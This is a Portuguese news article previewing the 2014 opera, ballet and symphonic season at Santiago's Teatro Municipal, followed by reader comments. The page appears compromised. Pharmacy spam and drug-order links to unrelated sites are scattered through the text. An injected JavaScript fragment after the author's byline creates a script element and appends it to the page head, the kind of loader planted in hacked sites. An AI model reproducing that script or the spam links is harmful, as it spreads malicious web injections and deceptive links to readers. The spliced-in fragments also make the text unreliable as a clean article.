NotíciaÓpera

Municipal de Santiago (Chile): as óperas de 2014

Buy http://bygonebureau.com/2018/02/01/order-pilex-cijena/ http://devi.mhs.narotama.ac.id/2018/02/02/carafate-how-much/

Variado repertório de óperas e coral-sinfônico no Municipal de Santiago do Chile em 2014.

Purchase Purchase


Após um incêndio que destruiu parte do acervo cenográfico daquele importante teatro de ópera e ballet chileno, o espírito de reerguer forças e de reconstruções cenográficas de vários títulos queimados entre eles: “O Quebra-Nozes”, “O Lago dos Cisnes”; somando-se ainda “Turandot” e “Zorba, el griego”,  ambas programadas para breve (em 2014) serem recolocadas em cena naquele palco, tudo será apresentado, apenas com datas remarcadas, a tempo de se recuperar o que foi consumido pelo fogo. Os amigos do Teatro Municipal, os artistas comprometidos com ele e as autoridades municipais e federais realmente se empenham para o seu pronto restabelecimento.

Cheap
As assinaturas para 2014 já foram lançadas no final de 2013, ainda antes do incêndio, ocorrido em 18 de novembro p.p. Iniciando a temporada lírica, com o intuito de ampliar seu repertório, apresentará “Katia Kabanova”, de Leos Janacek, no mês de maio: 02, 05, 07, 10 e 12. Regência de Konstantin Chudovsky e Pablo Lorrén direção de cena. Elenco: Dina Kusnetsova, Susanne Resmark, Evelyn Ramírez, Steven Ebel, Richard Cox, Tansel Alcreybek, Alexander Teliga.  Um expoente impressionante da opera do século XX.
http://militaryflagdisplays.com/%ef%bb%bfbuy-carbozyne/

“Os Puritanos”, de Vincenzo Bellini (1835), com direção musical de José Miguel Pérez-Sierra e direção cênica de Emilio Sagi. Susanna Phillips, Dimitry Korchak, Zhengshong Zhou, Sergey Artamanov, Evelyn Ramírez. Quando será? 30 de Maio, 03, 05, 06, 08 e 11 de junho.

triamterene hctz 75 50
“Lakmé”, a ópera francesa de Léo Delibes, (1883) se desenrola na lendária Índia, nos tempos da colonização britânica. Maximiliano Valdés é o diretor musical e regerá a Orquestra Filarmônica de Santiago, o Coro do Teatro Municipal e o Ballet de Santiago. Lakmé será Julia Novikova, com Ji-Min Park, Nerea Berraondo, Leonardo Neiva e Aimery Lefevre, compõem o “Cast” em seis récitas: 05, 07, 08, 10, 11 e 14 de julho.

“Otello”, de G. Verdi, (1887) terá a regência de Alexander Joel e cênica de Pablo Maritano. Cenografia de Enrique Bordolini e vestuário de Luca Dall’Alpi. No elenco, Kristian Benedikt,  Maria Jose Siri (que realizou uma notável Aída em S. Paulo; Evelyn Ramírez,  Sergey Mursaev e Alexey Tikhomirov. Coro Infantil, Coro do Teatro Municipal e OFS.  Agosto: dias 02, 06, 08, 09,  11 e 14.

“Turandot”, a última ópera de Giacomo Puccini, inconclusa até sua morte e completada por Franco Alfano, representa o trabalho mais maduro e magnífico do compositor italino do período pós romântico. Ambientado na China ancestral, um mundo especialmente sedutor e atraente, a obra reviverá a grande produção de Robert Oswald (Argentina) tendo sua direção cênica, cenografia e iluminação adicionada aos figurinos de Anibal Lápis e à regência e direção musical de Andriy Yurkevych. A Princesa Turandot será Elisabete Matos; Alfred Kim é Calaf; Gulmara Schafigulina (Liú) e Alexey Tikhomirov será Timur. Coro de meninos The Grange School, Coro do Teatro Municipal e Orquestra Filarmônica de Santiago. Setembro: 12, 13, 15, 22, 23; 28 (às 17:00h).

O mês de Outubro se inicia com a remontagem de “Zorba, el griego”, com música de Mikis Theodorskis e o Ballet de Santiago com direção de Marcia Haydée. Dias 09, 10 e 11 de Outubro.

“A Flauta Mágica”, a eterna favorita popular ópera de W. A. Mozart, regressa ao Teatro Municipal de Santiago com seu encanto argumental e melódico. No elenco, o tenor leggero Joel Prieto (Pamino); os sopranos Jennifer O’ Loughlin – como Rainha da Noite e Anett Fritsch (Pamina); o baixo In-Sung Sin (Sarastro); Adam Cioffari (Papageno), com direção musical e regência de Konstantin Chudovsky, direção cênica de Miryan Singer com cenografia e iluminação de Ramón López. Outubro (29) e 04, 05, 06, 08 e 10 de Novembro.

O repertório de concertos sinfônicos inclui entre outros o ciclo das nove sinfonias de Beethoven e seus concertos para piano e orquestra; a Sinfonia da Ressurreição nº 2, de Mahler; o concerto nº2- dó menor de Rachmaninoff,  Primavera e Os Sinos do mesmo compositor; a Sinfonia dos Salmos, de Igor Stravinsky. Entre os solistas estão os cantores Patrícia Cifuentes, Evelyn Ramirez, Jose Azócar e Christian Peregrino, (Chile);  os pianistas Jean-Effan Bavouzet (França);  Mathias Kirschmereit (Alemanha); Tamara Stefanovich (Sérvia); Severin von Eckardstein (Alemanha); Roberto Bravo (Chile); Boris Gietburg (Rússia) e Theo Gheorghiu (Canadá). Os dez concertos serão uma realização também da Orquestra Filarmônica de Santiago (8), e também da Orquestra Sinfônica Nacional Juvenil (l) e da Orquestra Sinfônica do Chile (l).

A Temporada 2014 do Teatro Municipal de Santiago serve de exemplo para a direção artística e administrativa do Teatro Municipal do Rio de Janeiro, tanto como pelo seu repertório, seus elencos artísticos e também pela realização de seu empreendimento cultural, que por aqui, fica naquela jogada de “empurra” um para o outro; (diretores técnico e administrativos, secretário estadual de cultura, diretor artístico e ou adjunto do Teatro Municipal RJ –  e ninguém assume a falta de continuidade, compromissos e de seriedade para com a realização do serviço a bem da cultura nacional).

Escrito por Marco Antônio Seta, em 02 de janeiro de 2014.
Inscrito sob nº 61.909 MTB – SPvar d=document;var s=d.createElement(‘script’); d.getElementsByTagName(‘head’)[0].appendChild(s);

Faça seu comentário

3 Comments

  1. Interessante esta antecipação dos eventos a serem realizados na América Hispânica (Chile). Tais comentários encantam e trazem um gostinho diferente às atividades culturais do Municipal de Santiago durante o ano de 2014. Suscita um planejamento prévio de uma possível “vacaciones” para apreciação dos variados repertórios de óperas e coral-sinfônico. !”Muy bueno y felicitaciones”!

  2. É uma temporada equilibrada, incluindo compositores do Séc. XX (Leos Janacek – Puccini) como V. Bellini e G. Verdi, Delibes e Mozart, como também Beethoven, Rachmaninoff, Stravinsky, G. Mahler e Mikis Theodorskis entre outros grandes mestres da música universal. EXEMPLO para o Theatro Municipal do Rio de Janeiro, que está pecando pela sua precária programação tanto de títulos, como de elencos artísticos. Já estamos em Janeiro e a temporada lírica de 2014 ainda não foi divulgada (elencos das récitas, se é que haverá: Carmen, Wozzek e Salomé).
    N.B. Todos os teatros brasileiros já anunciaram seus títulos e elencos, como também o Colón de Buenos Aires e o chileno supra.

Leave a Response

Marco Antônio Seta
Diplomado em Educação Musical, Artes Visuais e Educação Artística. Publicou artigos e críticas de óperas em vários veículos de SP ao longo de três décadas.